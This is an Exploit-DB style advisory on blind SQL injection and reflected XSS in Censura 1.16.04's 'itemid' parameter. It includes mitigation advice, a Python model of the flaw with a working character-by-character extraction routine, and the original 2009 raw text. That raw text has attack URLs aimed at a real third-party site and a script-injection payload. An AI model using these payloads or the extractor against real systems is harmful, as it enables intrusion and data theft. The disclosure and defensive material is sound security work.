Vendor: Censura
By: Vrs-hCk
CVSS: 9.3 (HIGH)
Title: Blind SQL/XSS
CWE: 89 (SQL Injection), 79 (Cross-site Scripting)
Product Name: Censura
Affected Version From: 1.16.04
Affected Version To: 1.16.04
Patch Exists: NO
Related CWE: CWE-89, CWE-79
CPE: a:censura:censura:1.16.04
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

(Blind SQL/XSS) Multiple Remote Vulnerabilities

Censura v1.16.04 is affected by two issues in the 'details' handler of 'censura.php', both reachable by an unauthenticated remote user. The 'itemid' parameter is concatenated into a SQL query without validation, so arbitrary SQL can be injected. The application gives no direct error output or data feedback, so exploitation is blind: the attacker appends a boolean condition to a valid id (the demo probes the database version with 'and substring(@@version,1,1)=4') and learns one bit per request from whether the item page still renders, which is enough to read arbitrary data from the database one character at a time. The same parameter is also reflected into the response without output encoding, so a crafted link executes attacker-supplied HTML and script in the browser of a victim who opens it, in the context of the affected site.

Mitigation:

Treat 'itemid' as an integer: reject any value that is not a plain number, and pass it to the database as a bound parameter of a prepared statement rather than concatenating it into the query text. HTML-entity encode anything echoed back into the page (the 'itemid' value and database content alike) so it cannot be interpreted as markup or script. Input validation alone is not a sufficient fix where the value is used both in SQL and in HTML.
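The following Python is an added example, not Censura's code and not part of the advisory. It models the 'details' handler as the advisory describes it against a constructed in-memory SQLite database (the tables, column names and sample rows are invented here), drives the boolean oracle the demo URL relies on to extract a value character by character, and shows the hardened handler described under Mitigation. Two assumptions are labelled in the code: a failed query is swallowed so the page still renders, and the MySQL-style '@@version' probe from the demo is replaced by SQLite's 'sqlite_version()'.

```python
import html
import sqlite3
import string

# Constructed stand-in for the site's database; schema and rows are invented
# for this example and are not Censura's.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT);
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
    INSERT INTO items VALUES (61, 'Sample review');
    INSERT INTO users VALUES (1, 'admin', 's3cr3t');
""")


def vulnerable_details(itemid: str) -> str:
    """Models censura.php?cmd=details&itemid=... as the advisory describes it:
    itemid is pasted into the SQL text and echoed into the HTML unencoded.
    Assumption: a query error is swallowed so the page still renders, as a PHP
    script that ignores query failures would."""
    query = "SELECT title FROM items WHERE id=" + itemid  # injection point
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        row = None
    if row is None:
        return "<p>No item " + itemid + "</p>"  # reflected unencoded: XSS
    return "<h1>" + row[0] + "</h1>"


def oracle(condition: str) -> bool:
    """Boolean oracle: does item 61 still render when `condition` is ANDed in?
    This is the advisory's 'itemid=61 and <condition>' probe."""
    return "<h1>" in vulnerable_details("61 and (" + condition + ")")


# Single quotes are left out so a probe never breaks its own SQL string literal.
CHARSET = string.ascii_letters + string.digits + "_-@.!$"


def extract(expr: str, maxlen: int = 32) -> str:
    """Recover the result of a scalar SQL expression one character at a time,
    asking only yes/no questions of the oracle (boolean-based blind SQLi)."""
    out = ""
    for pos in range(1, maxlen + 1):
        for ch in CHARSET:
            if oracle(f"substr(({expr}),{pos},1)='{ch}'"):
                out += ch
                break
        else:
            break  # nothing matched: end of string (or a char outside CHARSET)
    return out


def hardened_details(itemid: str) -> str:
    """Fix: accept only a plain decimal id, bind it as a query parameter, and
    HTML-encode everything that is reflected into the page."""
    if not itemid.isdecimal():
        return "<p>Invalid item id</p>"
    row = conn.execute("SELECT title FROM items WHERE id=?", (int(itemid),)).fetchone()
    if row is None:
        return "<p>No item " + html.escape(itemid) + "</p>"
    return "<h1>" + html.escape(row[0]) + "</h1>"


if __name__ == "__main__":
    # The advisory's version probe, adapted to SQLite (the demo used MySQL's @@version).
    print("major version is 3:", oracle("substr(sqlite_version(),1,1)='3'"))
    print("admin password:", extract("SELECT pass FROM users WHERE name='admin'"))
    print(vulnerable_details("<script>alert(123)</script>"))
    print(hardened_details("<script>alert(123)</script>"))
    print(hardened_details("61 and (1=1)"))
```

The oracle needs only the presence or absence of the rendered item, which is why the advisory calls the injection blind: no error text and no query output ever reach the attacker, yet every character of any value the database can compute is recoverable with a bounded number of requests. The hardened handler closes both findings at once because an id that is not a plain number never reaches the query, and anything that is reflected goes through html.escape.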

Exploit-DB raw data:

================================================================================================

 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : Censura v1.16.04
 Vendor   : http://www.censura.info/
 
 Date     : 12 July 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/

 ================================================================================================

 [-] Exploit

     http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL]
     http://[site]/[path]/censura.php?cmd=details&itemid=[XSS]

 [-] Demo

     http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
     http://www.yoozreviews.com/censura.php?cmd=details&itemid=<script>alert(123)</script>

 ================================================================================================

 Greetz   :

     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and a special muaacchh for the one I love (*_^)
     c0li.m0de.0n and Behave oR BeGone !!!

 ================================================================================================

# milw0rm.com [2009-07-12]